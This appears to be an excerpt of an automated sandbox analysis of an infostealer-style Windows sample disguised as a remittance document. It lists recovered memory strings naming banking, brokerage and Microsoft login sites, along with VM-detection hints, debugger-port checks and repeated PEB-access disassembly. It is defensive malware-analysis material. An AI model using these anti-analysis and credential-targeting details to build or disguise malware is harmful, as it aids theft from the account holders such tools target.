            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - GDCDYNVMware20,11696428655p
            Source: Y656-D6L1.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: firefox.exe, 00000015.00000002.2624285983.000001C34CB2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::9P
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2093278786.0000000006F61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\!b
            Source: Y656-D6L1.17.drBinary or memory string: discord.comVMware20,11696428655f
            Source: Y656-D6L1.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: global block list test formVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Y656-D6L1.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Y656-D6L1.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Y656-D6L1.17.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Y656-D6L1.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: winver.exe, 00000011.00000002.4494261459.00000000032B6000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4494566659.000000000157F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Y656-D6L1.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Y656-D6L1.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Y656-D6L1.17.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saction PasswordVMware20,11696428655^
            Source: Y656-D6L1.17.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Y656-D6L1.17.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Y656-D6L1.17.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Y656-D6L1.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Y656-D6L1.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,1169642
            Source: Y656-D6L1.17.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Y656-D6L1.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: winver.exe, 00000011.00000002.4498032806.0000000008143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696428655n
            Source: Y656-D6L1.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D096E rdtsc 9_2_017D096E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_004174C3 LdrLoadDll,9_2_004174C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01834180 mov eax, dword ptr fs:[00000030h]9_2_01834180
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01834180 mov eax, dword ptr fs:[00000030h]9_2_01834180
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184C188 mov eax, dword ptr fs:[00000030h]9_2_0184C188
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184C188 mov eax, dword ptr fs:[00000030h]9_2_0184C188
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181019F mov eax, dword ptr fs:[00000030h]9_2_0181019F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181019F mov eax, dword ptr fs:[00000030h]9_2_0181019F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181019F mov eax, dword ptr fs:[00000030h]9_2_0181019F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181019F mov eax, dword ptr fs:[00000030h]9_2_0181019F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796154 mov eax, dword ptr fs:[00000030h]9_2_01796154
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796154 mov eax, dword ptr fs:[00000030h]9_2_01796154
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178C156 mov eax, dword ptr fs:[00000030h]9_2_0178C156
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018561C3 mov eax, dword ptr fs:[00000030h]9_2_018561C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018561C3 mov eax, dword ptr fs:[00000030h]9_2_018561C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E1D0 mov eax, dword ptr fs:[00000030h]9_2_0180E1D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E1D0 mov eax, dword ptr fs:[00000030h]9_2_0180E1D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0180E1D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E1D0 mov eax, dword ptr fs:[00000030h]9_2_0180E1D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180E1D0 mov eax, dword ptr fs:[00000030h]9_2_0180E1D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C0124 mov eax, dword ptr fs:[00000030h]9_2_017C0124
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018661E5 mov eax, dword ptr fs:[00000030h]9_2_018661E5
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C01F8 mov eax, dword ptr fs:[00000030h]9_2_017C01F8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov eax, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov ecx, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov eax, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov eax, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov ecx, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov eax, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov eax, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov ecx, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov eax, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E10E mov ecx, dword ptr fs:[00000030h]9_2_0183E10E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01850115 mov eax, dword ptr fs:[00000030h]9_2_01850115
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183A118 mov ecx, dword ptr fs:[00000030h]9_2_0183A118
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183A118 mov eax, dword ptr fs:[00000030h]9_2_0183A118
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183A118 mov eax, dword ptr fs:[00000030h]9_2_0183A118
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183A118 mov eax, dword ptr fs:[00000030h]9_2_0183A118
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01824144 mov eax, dword ptr fs:[00000030h]9_2_01824144
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01824144 mov eax, dword ptr fs:[00000030h]9_2_01824144
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01824144 mov ecx, dword ptr fs:[00000030h]9_2_01824144
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01824144 mov eax, dword ptr fs:[00000030h]9_2_01824144
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01824144 mov eax, dword ptr fs:[00000030h]9_2_01824144
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01828158 mov eax, dword ptr fs:[00000030h]9_2_01828158
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864164 mov eax, dword ptr fs:[00000030h]9_2_01864164
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864164 mov eax, dword ptr fs:[00000030h]9_2_01864164
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178A197 mov eax, dword ptr fs:[00000030h]9_2_0178A197
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178A197 mov eax, dword ptr fs:[00000030h]9_2_0178A197
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178A197 mov eax, dword ptr fs:[00000030h]9_2_0178A197
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D0185 mov eax, dword ptr fs:[00000030h]9_2_017D0185
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BC073 mov eax, dword ptr fs:[00000030h]9_2_017BC073
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01792050 mov eax, dword ptr fs:[00000030h]9_2_01792050
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018280A8 mov eax, dword ptr fs:[00000030h]9_2_018280A8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018560B8 mov eax, dword ptr fs:[00000030h]9_2_018560B8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018560B8 mov ecx, dword ptr fs:[00000030h]9_2_018560B8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178A020 mov eax, dword ptr fs:[00000030h]9_2_0178A020
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178C020 mov eax, dword ptr fs:[00000030h]9_2_0178C020
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018120DE mov eax, dword ptr fs:[00000030h]9_2_018120DE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018160E0 mov eax, dword ptr fs:[00000030h]9_2_018160E0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE016 mov eax, dword ptr fs:[00000030h]9_2_017AE016
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01814000 mov ecx, dword ptr fs:[00000030h]9_2_01814000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01832000 mov eax, dword ptr fs:[00000030h]9_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178C0F0 mov eax, dword ptr fs:[00000030h]9_2_0178C0F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D20F0 mov ecx, dword ptr fs:[00000030h]9_2_017D20F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017980E9 mov eax, dword ptr fs:[00000030h]9_2_017980E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0178A0E3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01826030 mov eax, dword ptr fs:[00000030h]9_2_01826030
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01816050 mov eax, dword ptr fs:[00000030h]9_2_01816050
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017880A0 mov eax, dword ptr fs:[00000030h]9_2_017880A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179208A mov eax, dword ptr fs:[00000030h]9_2_0179208A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018163C0 mov eax, dword ptr fs:[00000030h]9_2_018163C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184C3CD mov eax, dword ptr fs:[00000030h]9_2_0184C3CD
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018343D4 mov eax, dword ptr fs:[00000030h]9_2_018343D4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018343D4 mov eax, dword ptr fs:[00000030h]9_2_018343D4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov eax, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov eax, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov ecx, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183E3DB mov eax, dword ptr fs:[00000030h]9_2_0183E3DB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178C310 mov ecx, dword ptr fs:[00000030h]9_2_0178C310
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B0310 mov ecx, dword ptr fs:[00000030h]9_2_017B0310
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA30B mov eax, dword ptr fs:[00000030h]9_2_017CA30B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA30B mov eax, dword ptr fs:[00000030h]9_2_017CA30B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA30B mov eax, dword ptr fs:[00000030h]9_2_017CA30B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C63FF mov eax, dword ptr fs:[00000030h]9_2_017C63FF
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE3F0 mov eax, dword ptr fs:[00000030h]9_2_017AE3F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE3F0 mov eax, dword ptr fs:[00000030h]9_2_017AE3F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE3F0 mov eax, dword ptr fs:[00000030h]9_2_017AE3F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov eax, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov ecx, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov eax, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov eax, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0186634F mov eax, dword ptr fs:[00000030h]9_2_0186634F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01838350 mov ecx, dword ptr fs:[00000030h]9_2_01838350
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185A352 mov eax, dword ptr fs:[00000030h]9_2_0185A352
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov ecx, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788397 mov eax, dword ptr fs:[00000030h]9_2_01788397
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788397 mov eax, dword ptr fs:[00000030h]9_2_01788397
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788397 mov eax, dword ptr fs:[00000030h]9_2_01788397
